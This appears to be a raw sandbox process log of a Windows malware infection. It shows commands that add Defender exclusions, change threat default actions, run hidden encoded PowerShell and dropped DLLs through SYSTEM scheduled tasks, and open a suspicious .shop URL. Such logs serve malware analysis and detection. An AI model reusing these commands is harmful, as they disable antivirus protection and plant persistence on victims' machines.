"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zVzqvyOSihYKJvOyVZR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zVzqvyOSihYKJvOyVZR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\eAyGpXrokhrqbyVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\eAyGpXrokhrqbyVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6664 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\biDkmZKUdoGBvHzxU /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\biDkmZKUdoGBvHzxU /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UvGNNHxtLtcCkoYu /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UvGNNHxtLtcCkoYu /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gsWrlrtjW" /SC once /ST 06:11:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gsWrlrtjW"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:126.0) Gecko/126.0 Firefox/126.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2828 --field-trial-handle=2836,i,13151437112617325844,16789092778118196968,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:126.0) Gecko/126.0 Firefox/126.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3092 --field-trial-handle=2836,i,13151437112617325844,16789092778118196968,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:126.0) Gecko/126.0 Firefox/126.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3120 --field-trial-handle=2836,i,13151437112617325844,16789092778118196968,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:126.0) Gecko/126.0 Firefox/126.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3196 --field-trial-handle=2836,i,13151437112617325844,16789092778118196968,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:126.0) Gecko/126.0 Firefox/126.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3216 --field-trial-handle=2836,i,13151437112617325844,16789092778118196968,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:126.0) Gecko/126.0 Firefox/126.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4184 --field-trial-handle=2836,i,13151437112617325844,16789092778118196968,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gsWrlrtjW"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "IdVtZOOUCgewbUgTH" /SC once /ST 03:43:27 /RU "SYSTEM" /TR "\"C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe\" E6 /zxJZdidom 757674 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "IdVtZOOUCgewbUgTH"
C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe
C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe E6 /zxJZdidom 757674 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2928 -ip 2928
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 816
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bozJhwcBWfTIuPvJGw"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RYkefsiHU\WdGIBp.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "crLdjPbboKRrxLe" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "crLdjPbboKRrxLe2" /F /xml "C:\Program Files (x86)\RYkefsiHU\QXOSJUk.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "crLdjPbboKRrxLe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "crLdjPbboKRrxLe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "uZMBBcqLgvQqCb" /F /xml "C:\Program Files (x86)\RXHKfDSqirfU2\VjmwrNA.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "zDqwIeVshbAQa2" /F /xml "C:\ProgramData\eAyGpXrokhrqbyVB\WzAHFIz.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "tPRAXBqzUUfWtUSpv2" /F /xml "C:\Program Files (x86)\zVzqvyOSihYKJvOyVZR\QsLDxyt.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bnICqnIaulJfWHAOxOU2" /F /xml "C:\Program Files (x86)\MovZspCuTpPaC\BhIuTuG.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "abqDtlgLJZrFmRhwl" /SC once /ST 21:20:48 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\UvGNNHxtLtcCkoYu\GPCvYTTW\xqbhEQr.dll\",#1 /cVZjdidVg 757674" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "abqDtlgLJZrFmRhwl"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UvGNNHxtLtcCkoYu\GPCvYTTW\xqbhEQr.dll",#1 /cVZjdidVg 757674
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UvGNNHxtLtcCkoYu\GPCvYTTW\xqbhEQr.dll",#1 /cVZjdidVg 757674
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2232
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "dRKdk1" /SC once /ST 19:24:08 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1736
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "dRKdk1"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "jhnbW1" /SC once /ST 11:22:06 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "jhnbW1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "abqDtlgLJZrFmRhwl"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffae238ab58,0x7ffae238ab68,0x7ffae238ab78
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffae1cd46f8,0x7ffae1cd4708,0x7ffae1cd4718
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2020
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=2460,i,8998513089586113364,3947514793912153758,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=2460,i,8998513089586113364,3947514793912153758,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1992 --field-trial-handle=2460,i,8998513089586113364,3947514793912153758,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3104 --field-trial-handle=2460,i,8998513089586113364,3947514793912153758,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=2460,i,8998513089586113364,3947514793912153758,131072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3452 --field-trial-handle=2460,i,8998513089586113364,3947514793912153758,131072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2936 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2944 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3116 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3720 --field-trial-handle=2460,i,8998513089586113364,3947514793912153758,131072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://soneremonasez.shop/27844da3c568ad0171b0215c3223d7c0FW66Ze6GvDRWkFZlAckACzBeIowWpJM2HZo
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffae1cd46f8,0x7ffae1cd4708,0x7ffae1cd4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
